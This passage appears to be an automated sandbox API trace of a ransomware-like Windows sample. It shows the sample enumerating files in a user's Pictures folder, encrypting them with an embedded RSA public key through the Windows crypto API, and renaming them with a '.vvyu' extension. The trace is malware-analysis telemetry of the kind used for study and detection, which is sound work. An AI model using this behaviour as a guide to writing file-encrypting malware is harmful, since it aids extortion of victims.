hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.354] GetCurrentThreadId () returned 0x264 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37b58 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.355] GetCurrentThreadId () returned 0x264 [0187.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0187.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39748 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39790 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397a8 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39718 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39730 [0187.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38be0 | out: hHeap=0x6a0000) returned 1 [0187.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.366] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x154b2, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x154b2, lpOverlapped=0x0) returned 1 [0187.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.367] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x154b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.367] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.368] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.369] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.369] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.369] CloseHandle (hObject=0x584) returned 1 [0187.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0187.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.371] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\a8cSBpx3PB.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\a8csbpx3pb.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\a8cSBpx3PB.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\a8csbpx3pb.jpg.vvyu")) returned 1 [0187.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.373] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.377] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38be0 [0187.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0187.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38be0 | out: hHeap=0x6a0000) returned 1 [0187.377] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini") returned=".ini" [0187.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.378] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96a20590, ftCreationTime.dwHighDateTime=0x1d8a471, ftLastAccessTime.dwLowDateTime=0xed101870, ftLastAccessTime.dwHighDateTime=0x1d8a563, ftLastWriteTime.dwLowDateTime=0xed101870, ftLastWriteTime.dwHighDateTime=0x1d8a563, nFileSizeHigh=0x0, nFileSizeLow=0xe4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lv6DMrgKbM_9C6x.jpg", cAlternateFileName="LV6DMR~1.JPG")) returned 1 [0187.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38be0 [0187.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38be0 | out: hHeap=0x6a0000) returned 1 [0187.378] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\lv6DMrgKbM_9C6x.jpg") returned=".jpg" [0187.378] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\lv6DMrgKbM_9C6x.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\lv6dmrgkbm_9c6x.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.379] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=3663) returned 1 [0187.379] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.381] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.381] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.384] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.384] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe4f, lpOverlapped=0x0) returned 1 [0187.384] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.385] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.386] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.386] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.386] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.386] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.386] GetLastError () returned 0x0 [0187.386] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.386] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.387] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.387] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.387] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe50) returned 0x2d3a670 [0187.387] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 